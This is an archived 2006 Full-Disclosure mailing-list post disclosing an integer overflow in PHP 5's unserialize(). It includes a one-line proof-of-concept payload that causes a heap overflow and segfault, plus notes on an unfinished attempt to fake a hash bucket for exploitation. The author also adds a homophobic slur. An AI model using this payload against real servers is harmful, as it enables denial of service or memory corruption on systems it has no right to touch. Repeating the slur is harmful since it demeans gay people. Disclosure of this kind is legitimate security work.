[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <8f6a58a30610170748i1333fb38tfb6fb1a1c5442642@mail.gmail.com>
Date: Tue, 17 Oct 2006 16:48:48 +0200
From: "Slythers Bro" <slythers@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PHP 5 ecalloc memory manager unserialize() array
int overflow ia 32 bits poc
<?
print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));
?>
in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow
here segfault in zend_hash_find() but it's possible to fake the bucket and
exploit a zend_hash_del_index_or_key
i tried a memory dump , just fake the bucked with the pointer of the
$GLOBALS's bucket but segfault before in memory_shutdown...
don't cry a river :P
ethic is for gayz
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists